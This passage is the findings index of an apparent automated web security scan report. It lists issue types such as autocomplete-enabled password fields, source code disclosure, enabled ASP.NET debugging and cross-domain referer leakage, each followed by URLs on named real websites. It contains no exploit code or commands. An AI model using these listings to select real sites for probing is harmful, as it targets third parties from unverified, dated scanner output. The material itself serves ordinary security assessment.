16.371. http://www.righthealth.com/javascripts/adore/ad2.html

16.372. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js

16.373. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js

16.374. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css

16.375. http://www.righthealth.com/topic/What_Is_Hipaa

16.376. http://www.saksfifthavenue.com/main/ProductDetail.jsp

16.377. http://www.shadowtrack.com/index.php

16.378. http://www.shopstyle.com/browse

16.379. http://www.strausnews.com/_captcha/render

16.380. http://www.strausnews.com/_captcha/render

16.381. http://www.stumbleupon.com/submit

16.382. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

16.383. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

16.384. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/index.php

16.385. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/index.php

16.386. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

16.387. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/index.php

16.388. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/index.php

16.389. http://www.thefashionablegal.com/wp-login.php

16.390. http://www.truelocal.com.au/

16.391. http://www.vpswebserver.com/livezilla/server.php

16.392. http://www.webhostingtalk.com/showthread.php

16.393. http://www.weichert.com/search/realestate/PropertyListing.aspx

16.394. http://www.wiseshop.com/contact.html

16.395. http://www.wiseshop.com/sign_up.html

16.396. http://www.wtp101.com/ab_sync

16.397. http://www.youtube.com/api_video_info

16.398. http://www.youtube.com/results

16.399. http://www.youtube.com/watch

16.400. http://www2.idexpertscorp.com/

16.401. http://www2.idexpertscorp.com/blog/

16.402. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/

16.403. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/

16.404. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/

16.405. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/

16.406. http://www2.idexpertscorp.com/page-not-found/

16.407. http://www2.idexpertscorp.com/site/404/

16.408. http://www2.tek.com/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

16.409. http://www2.tek.com/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

16.410. http://www22.glam.com/cTagsImgCmd.act

16.411. http://www35.glam.com/gad/glamadapt_jsrv.act

16.412. http://www35.glam.com/gad/glamadapt_jsrv.act

16.413. http://xads.zedo.com/ads2/c

16.414. http://xads.zedo.com/ads3/a

16.415. http://xml.west.REDACTED.overture.com/d/search/p/REDACTED/xml/en-au/v8/

16.416. http://yads.zedo.com/ads3/a

17. Password field with autocomplete enabled

17.1. https://admin.iconnection.com/login.aspx

17.2. http://au.myspace.com/

17.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

17.4. https://auth.tek.com/mytek/faces/loginregistration.jsp

17.5. https://clientcommunity.touchnet.com/web/login.action

17.6. https://customer.trizetto.com/OnyxCustomerPortal/login.asp

17.7. http://cx.trizetto.com/

17.8. http://designers.glam.com/2011/04/29/wp-content/themes/glam_v1/glam-login/login_template.php

17.9. https://idesk.infocrossing.com/

17.10. https://support.logrhythm.com/ics/support/mylogin.asp

17.11. https://tracker.i-structure.com/

17.12. http://vpswebserver.com/

17.13. http://www.glam.com/profile

17.14. http://www.glam.com/wp-content/themes/glam_v1/glam-login/login_template.php

17.15. https://www.hipaastore.com/index.php

17.16. https://www.hipaastore.com/index.php

17.17. https://www.idexpertscorp.com/RADAR/

17.18. https://www.idexpertscorp.com/dbhc/

17.19. https://www.idexpertscorp.com/membership/

17.20. http://www.patlive.com/appointment-scheduling/

17.21. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

17.22. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

17.23. http://www.thefashionablegal.com/wp-login.php

17.24. http://www.thefashionablehousewife.com/wp-login.php

18. Source code disclosure

18.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

18.2. http://www.glam.com/wp-content/plugins/facebook-activity-feed-widget-for-wordpress/jscolor/jscolor.min.js

18.3. http://www.trizetto.com/favicon.ico

18.4. http://www.trizetto.com/newMenu/arrow-down.gif

18.5. http://www25.glam.com/files/gadget-store/installs/84371626942385/flvpath_2-73131245.flv

19. ASP.NET debugging enabled

19.1. http://4qinvite.4q.iperceptions.com/Default.aspx

19.2. http://clk.pointroll.com/Default.aspx

19.3. http://www.patlive.com/Default.aspx

20. Referer-dependent response

20.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

20.2. http://480-adver-view.c3metrics.com/v.js

20.3. http://ads.adbrite.com/adserver/behavioral-data/8201

20.4. http://ads.adbrite.com/adserver/behavioral-data/8204

20.5. http://ads.adbrite.com/adserver/vdi/712156

20.6. http://ads.adbrite.com/adserver/vdi/779045

20.7. http://ads.sixapart.com/custom

20.8. http://adserving.cpxinteractive.com/st

20.9. http://api.twitter.com/1/statuses/user_timeline.json

20.10. http://arts.onbloglist.com/img12.php

20.11. http://c.brightcove.com/services/viewer/federated_f9

20.12. http://idexperts.wufoo.com/embed/z7x4a3/def/embedKey=z7x4a3578302&referrer=

20.13. http://map.media6degrees.com/orbserv/aopix

20.14. http://twitter.com/statuses/user_timeline/fashionablegal.json

20.15. http://www.facebook.com/plugins/activity.php

20.16. http://www.facebook.com/plugins/like.php

20.17. http://www.facebook.com/plugins/recommendations.php

20.18. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

20.19. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/index.php

20.20. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

20.21. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/index.php

20.22. http://www.youtube.com/apiplayer

21. Cross-domain POST

21.1. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

21.2. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.3. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.4. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.5. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.6. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.7. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.8. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.9. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

22. Cross-domain Referer leakage

22.1. http://0.r.REDACTED.com/

22.2. http://0.r.REDACTED.com/

22.3. http://0.r.REDACTED.com/

22.4. http://0.r.REDACTED.com/

22.5. http://1077745.r.REDACTED.com/

22.6. http://595221.r.REDACTED.com/

22.7. http://656900.r.REDACTED.com/

22.8. http://954370.r.REDACTED.com/

22.9. http://a.rad.REDACTED.com/ADSAdClient31.dll

22.10. http://a.rad.REDACTED.com/ADSAdClient31.dll

22.11. http://ad-apac.doubleclick.net/adj/onl.bt.news/opinion/politics

22.12. http://ad.amgdgt.com/ads/

22.13. http://ad.amgdgt.com/ads/

22.14. http://ad.amgdgt.com/ads/

22.15. http://ad.au.doubleclick.net/adj/ndm.dtm/news/breakingnews/national

22.16. http://ad.au.doubleclick.net/adj/ndm.dtm/news/breakingnews/national

22.17. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews/national

22.18. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews/national

22.19. http://ad.au.doubleclick.net/adj/ndm.taus/news

22.20. http://ad.au.doubleclick.net/adj/ndm.taus/news

22.21. http://ad.au.doubleclick.net/adj/ndm.taus/news/nation

22.22. http://ad.au.doubleclick.net/adj/ndm.taus/news/nation

22.23. http://ad.au.doubleclick.net/adj/ndm.tst/news

22.24. http://ad.au.doubleclick.net/adj/ndm.tst/news

22.25. http://ad.au.doubleclick.net/adj/ndm.tst/news/state

22.26. http://ad.au.doubleclick.net/adj/ndm.tst/news/state

22.27. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390

22.28. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684

22.29. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687

22.30. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689

22.31. http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22

22.32. http://ad.doubleclick.net/adi/N5956.Turn/B3941858.17

22.33. http://ad.doubleclick.net/adj/N1243.Glam.com/B5234896.7

22.34. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

22.35. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

22.36. http://ad.doubleclick.net/adj/N4674.149112.GLAMMEDIANETWORK/B5435962.2

22.37. http://ad.doubleclick.net/adj/N4674.149112.GLAMMEDIANETWORK/B5435962.215

22.38. http://ad.doubleclick.net/adj/N5390.6393.9658750318521/B5269344.8

22.39. http://ad.doubleclick.net/adj/kmx.righthealth/results

22.40. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories

22.41. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories

22.42. http://ad.doubleclick.net/adj/mi.hhd00/News/National

22.43. http://ad.turn.com/server/ads.js

22.44. http://ad.turn.com/server/ads.js

22.45. http://ad.yieldmanager.com/iframe3

22.46. http://ad.yieldmanager.com/iframe3

22.47. http://ad.yieldmanager.com/iframe3

22.48. http://ad.yieldmanager.com/pixel

22.49. http://adadvisor.net/adscores/g.js

22.50. http://adadvisor.net/adscores/g.js

22.51. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.52. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.53. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.54. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.55. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.56. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.57. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.58. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.59. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.60. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.61. http://ads.pointroll.com/PortalServe/

22.62. http://ads.pointroll.com/PortalServe/

22.63. http://ads.pointroll.com/PortalServe/

22.64. http://ads.pointroll.com/PortalServe/

22.65. http://ads.pointroll.com/PortalServe/

22.66. http://ads.pointroll.com/PortalServe/

22.67. http://ads.pointroll.com/PortalServe/

22.68. http://ads.pointroll.com/PortalServe/

22.69. http://ads.pointroll.com/PortalServe/

22.70. http://ads.revsci.net/adserver/ako

22.71. http://ads.revsci.net/adserver/ako

22.72. http://ads.revsci.net/adserver/ako

22.73. http://ads.revsci.net/adserver/ako

22.74. http://ads.revsci.net/adserver/ako

22.75. http://ads.shopstyle.com/

22.76. http://ads.sixapart.com/custom

22.77. http://ads.sixapart.com/custom

22.78. http://ads.specificmedia.com/serve/v=5

22.79. http://ads.specificmedia.com/serve/v=5

22.80. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

22.81. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

22.82. https://auth.tek.com/mytek/faces/loginregistration.jsp

22.83. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.84. http://bidder.mathtag.com/iframe/notify

22.85. http://bidder.mathtag.com/iframe/notify

22.86. http://bidder.mathtag.com/iframe/notify

22.87. http://celebrities.glam.com/topic/

22.88. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.89. http://choices.truste.com/ca

22.90. http://clickserve.cc-dt.com/link/tplimage

22.91. http://clk.pointroll.com/bc/

22.92. http://cm.g.doubleclick.net/pixel

22.93. http://REDACTED/js_1_0/

22.94. http://delb.opt.fimserve.com/adopt/

22.95. http://demr.opt.fimserve.com/adopt/

22.96. http://desb.opt.fimserve.com/adopt/

22.97. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.98. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

22.99. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

22.100. http://engine.cmmeglobal.com/v1/request

22.101. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.102. http://fls.doubleclick.net/activityi

22.103. http://gan.doubleclick.net/gan_impression

22.104. http://gan.doubleclick.net/gan_impression

22.105. http://googleads.g.doubleclick.net/pagead/ads

22.106. http://googleads.g.doubleclick.net/pagead/ads

22.107. http://googleads.g.doubleclick.net/pagead/ads

22.108. http://googleads.g.doubleclick.net/pagead/ads

22.109. http://googleads.g.doubleclick.net/pagead/ads

22.110. http://googleads.g.doubleclick.net/pagead/ads

22.111. http://googleads.g.doubleclick.net/pagead/ads

22.112. http://googleads.g.doubleclick.net/pagead/ads

22.113. http://googleads.g.doubleclick.net/pagead/ads

22.114. http://googleads.g.doubleclick.net/pagead/ads

22.115. http://googleads.g.doubleclick.net/pagead/ads

22.116. http://googleads.g.doubleclick.net/pagead/ads

22.117. http://ib.adnxs.com/ab

22.118. http://ib.adnxs.com/acb

22.119. http://ib.adnxs.com/acb

22.120. http://ib.adnxs.com/acb

22.121. http://ib.adnxs.com/if

22.122. http://ib.adnxs.com/ptj

22.123. http://ib.adnxs.com/ptj

22.124. http://ib.adnxs.com/ptj

22.125. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js

22.126. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js

22.127. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js

22.128. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js

22.129. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js

22.130. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js

22.131. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js

22.132. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js

22.133. http://leader.linkexchange.com/3/X889499/showlogo

22.134. http://leader.linkexchange.com/6/X889499/showlogo

22.135. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.136. http://loadus.exelator.com/load/

22.137. http://loadus.exelator.com/load/

22.138. http://loadus.exelator.com/load/

22.139. http://loadus.exelator.com/load/

22.140. http://loadus.exelator.com/load/net.php

22.141. http://maps.google.com/maps

22.142. http://media.adfrontiers.com/pq

22.143. http://media.fastclick.net/w/get.media

22.144. http://mf.sitescout.com/disp

22.145. http://news.9REDACTED.com.au/js/bld/lcm.js

22.146. http://news.REDACTED/national/8241327/migration-proposal-weak-abbott-says

22.147. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

22.148. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

22.149. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

22.150. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

22.151. http://pixel.invitemedia.com/rubicon_sync

22.152. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

22.153. http://rad.REDACTED.com/ADSAdClient31.dll

22.154. http://rad.REDACTED.com/ADSAdClient31.dll

22.155. http://rad.REDACTED.com/ADSAdClient31.dll

22.156. http://rad.REDACTED.com/ADSAdClient31.dll

22.157. http://rd.apmebf.com/w/get.media

22.158. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

22.159. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2_functions.js

22.160. http://www.bing.com/news/search

22.161. http://www.bing.com/search

22.162. http://www.bing.com/search

22.163. http://www.bing.com/social/s/icon_rt.gif

22.164. http://www.bing.com/social/socialwidget/fuse-montage-twitter-widget-v1.htm

22.165. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

22.166. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

22.167. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

22.168. http://www.businessspectator.com.au/bs.nsf/fmJobListings

22.169. http://www.businessspectator.com.au/bs.nsf/fmJobListings

22.170. http://www.businessspectator.com.au/bs.nsf/fmJobListings

22.171. http://www.connect.facebook.com/widgets/fan.php

22.172. http://www.connect.facebook.com/widgets/fan.php

22.173. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

22.174. http://www.facebook.com/plugins/activity.php

22.175. http://www.facebook.com/plugins/facepile.php

22.176. http://www.facebook.com/plugins/like.php

22.177. http://www.facebook.com/plugins/likebox.php

22.178. http://www.facebook.com/plugins/likebox.php

22.179. http://www.facebook.com/plugins/likebox.php

22.180. http://www.facebook.com/plugins/likebox.php

22.181. http://www.facebook.com/plugins/likebox.php

22.182. http://www.facebook.com/plugins/likebox.php

22.183. http://www.facebook.com/plugins/likebox.php

22.184. http://www.facebook.com/plugins/recommendations.php

22.185. http://www.facebook.com/plugins/recommendations.php

22.186. http://www.flickr.com/badge_code_v2.gne

22.187. http://www.glam.com/

22.188. http://www.glam.com/app/site/loadServicePage.act

22.189. http://www.glam.com/topic/

22.190. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.191. http://www.google.com/search

22.192. http://www.google.com/search

22.193. http://www.hipaastore.com/index.php

22.194. http://www.inspiredelearning.com/inspired/request.info.htm

22.195. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

22.196. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js

22.197. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css

22.198. http://www.righthealth.com/topic/What_Is_Hipaa

22.199. http://www.skynews.com.au/topstories/article.aspx

22.200. http://www.strausnews.com/shared-content/myweather/weather.php

22.201. http://www.strausnews.com/shared-content/myweather/weather.php

22.202. http://www.strausnews.com/shared-content/myweather/weather.php

22.203. http://www.strausnews.com/shared-content/myweather/weather.php

22.204. http://www.strausnews.com/shared-content/myweather/weather.php

22.205. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

22.206. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

22.207. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.208. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.209. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.210. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.211. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.212. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.213. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

22.214. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

22.215. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

22.216. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

22.217. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

23. Cross-domain script include

23.1. http://ad.amgdgt.com/ads/

23.2. http://ad.amgdgt.com/ads/

23.3. http://ad.amgdgt.com/ads/

23.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390

23.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684

23.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687

23.7. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689

23.8. http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22

23.9. http://ad.doubleclick.net/adi/N5956.Turn/B3941858.17

23.10. http://ad.turn.com/server/ads.js

23.11. http://ad.turn.com/server/ads.js

23.12. http://ad.yieldmanager.com/iframe3

23.13. http://adadvisor.net/adscores/g.js

23.14. http://adadvisor.net/adscores/g.js

23.15. http://ads.revsci.net/adserver/ako

23.16. http://ads.revsci.net/adserver/ako

23.17. http://ads.revsci.net/adserver/ako

23.18. http://ads.revsci.net/adserver/ako

23.19. http://ads.revsci.net/adserver/ako

23.20. http://ads.shopstyle.com/

23.21. http://ads.sixapart.com/custom

23.22. http://ads.sixapart.com/custom

23.23. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

23.24. http://au.myspace.com/

23.25. https://auth.tek.com/mytek/faces/forgotpassword.jsp

23.26. https://auth.tek.com/mytek/faces/loginregistration.jsp

23.27. http://beauty.glam.com/

23.28. http://beauty.glam.com/2011/04/11/get-the-look-nicole-ari-parker-is-pretty-as-a-peach/

23.29. http://beauty.glam.com/2011/04/11/get-the-look-nicole-ari-parker-is-pretty-as-a-peach/wp-content/themes/glam_v1/static/images/ad_icon_small.png

23.30. http://bidder.mathtag.com/iframe/notify

23.31. http://c5.zedo.com//ads3/k/305/934163/4381/1000003/i.js

23.32. http://celebrities.glam.com/

23.33. http://celebrities.glam.com/topic/

23.34. http://demr.opt.fimserve.com/adopt/

23.35. http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/

23.36. http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/wp-content/themes/glam_v1/static/images/ad_icon_small.png

23.37. http://designers.glam.com/forgotpassword

23.38. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

23.39. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

23.40. http://entertainment.glam.com/

23.41. http://entertainment.glam.com/

23.42. http://entertainment.glam.com/2011/04/06/meet-the-cast-of-braxton-family-values/

23.43. http://fls.doubleclick.net/activityi

23.44. http://glam.ivwbox.de/2004/01/survey.js

23.45. http://googleads.g.doubleclick.net/pagead/ads

23.46. http://googleads.g.doubleclick.net/pagead/ads

23.47. http://ib.adnxs.com/acb

23.48. http://ib.adnxs.com/if

23.49. http://ib.adnxs.com/ptj

23.50. http://living.glam.com/

23.51. http://living.glam.com/

23.52. http://loadus.exelator.com/load/

23.53. http://lp.idexpertscorp.com/hitech-whitepapera/

23.54. http://media.adfrontiers.com/pq

23.55. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnewsau/ros/728x90/jx/ss/a/1623201161@Top1

23.56. http://news.REDACTED/national/8241327/migration-proposal-weak-abbott-says

23.57. http://news.xinhuanet.com/english2010/world/2011-05/02/c_13855230.htm

23.58. http://r1-ads.ace.advertising.com/site=743833/size=300250/u=2/bnum=65003685/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.thesunchronicle.com%252Farticles%252F2011%252F05%252F02%252Frehoboth%252F9166782.txt

23.59. http://r1-ads.ace.advertising.com/site=781800/size=728090/u=2/bnum=78594486/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.islandpacket.com%252F2011%252F05%252F02%252F1640363%252Fwill-killing-osama-kill-the-movement.html

23.60. http://r1-ads.ace.advertising.com/site=795866/size=728090/u=2/bnum=47065580/hr=15/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.righthealth.com%252Ftopic%252FWhat_Is_Hipaa%253Fp%253Dl%2526as%253DREDACTED%2526ac%253D529%2526kgl%253D38620759

23.61. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=54085448/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

23.62. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=28266332/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.dailytelegraph.com.au%252Fnews%252Fbreaking-news%252Ftony-abbott-says-migration-proposals-are-weak%252Fstory-e6freuz0-1226045133021%253Ffrom%253Dpublic_rss

23.63. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=29579703/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theaustralian.com.au%252Fnews%252Fnation%252Fabbott-a-hero-on-troubled-christmas-island%252Fstory-e6frg6nf-1226045245809

23.64. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=65424947/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.news.com.au%252Fbreaking-news%252Fnational%252Fchristmas-island-detainee-sews-lips-together%252Fstory-e6frfku9-1226044502823

23.65. http://resources.brisbanetimes.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.66. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

23.67. http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.68. http://resources.theage.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.69. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.70. http://vpswebserver.com/

23.71. http://www.afewgoodygumdrops.com/2011/04/few-goody-gumdrops-reviews-christian.html

23.72. http://www.bing.com/social/socialwidget/fuse-montage-twitter-widget-v1.htm

23.73. http://www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html

23.74. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

23.75. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

23.76. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

23.77. http://www.connect.facebook.com/widgets/fan.php

23.78. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

23.79. http://www.facebook.com/plugins/activity.php

23.80. http://www.facebook.com/plugins/facepile.php

23.81. http://www.facebook.com/plugins/like.php

23.82. http://www.facebook.com/plugins/likebox.php

23.83. http://www.facebook.com/plugins/recommendations.php

23.84. http://www.glam.com/

23.85. http://www.glam.com/

23.86. http://www.glam.com/

23.87. http://www.glam.com/

23.88. http://www.glam.com/

23.89. http://www.glam.com/

23.90. http://www.glam.com/2011/04/11/sip-in-the-scene-at-the-glamourous-paramount-bar/

23.91. http://www.glam.com/app/site/loadServicePage.act

23.92. http://www.glam.com/app/site/loadServicePage.act

23.93. http://www.glam.com/category/uncategorized/

23.94. http://www.glam.com/forgotpassword

23.95. http://www.glam.com/forgotpassword

23.96. http://www.glam.com/go-natural/

23.97. http://www.glam.com/profile

23.98. http://www.glam.com/style/

23.99. http://www.glam.com/topic/

23.100. http://www.glam.com/topic/

23.101. http://www.glam.com/videos/

23.102. http://www.glam.com/wp-content/plugins/disqus-comment-system/xd_receiver.htm

23.103. http://www.glam.de/

23.104. http://www.glam.jp/

23.105. http://www.glammedia.com/

23.106. http://www.glammedia.com/about_glam/legal/copyright_policy.php

23.107. http://www.glammedia.com/about_glam/legal/optout.php

23.108. http://www.glammedia.com/about_glam/legal/privacy.php

23.109. http://www.glammedia.com/about_glam/legal/privacyandsecuritypolicy-previousversion9-12-2007.php

23.110. http://www.glammedia.com/about_glam/legal/terms_of_use.php

23.111. http://www.glammedia.com/about_glam/news/2009/03/31/glam-media-launches-tinkercom%E2%80%94the-first-twitter-facebook-micro-blogging-service-for-real-time-conversations-on-events-and-breaking-news

23.112. http://www.glammedia.com/about_glam/news/2009/03/31/glam-media-launches-tinkercom—the-first-twitter-facebook-micro-blogging-service-for-real-time-conversations-on-events-and-breaking-news

23.113. http://www.glammedia.com/about_glam/news/2009/03/legal/privacy.php

23.114. http://www.glammedia.com/about_glam/news/2009/03/our_properties/tinker.php

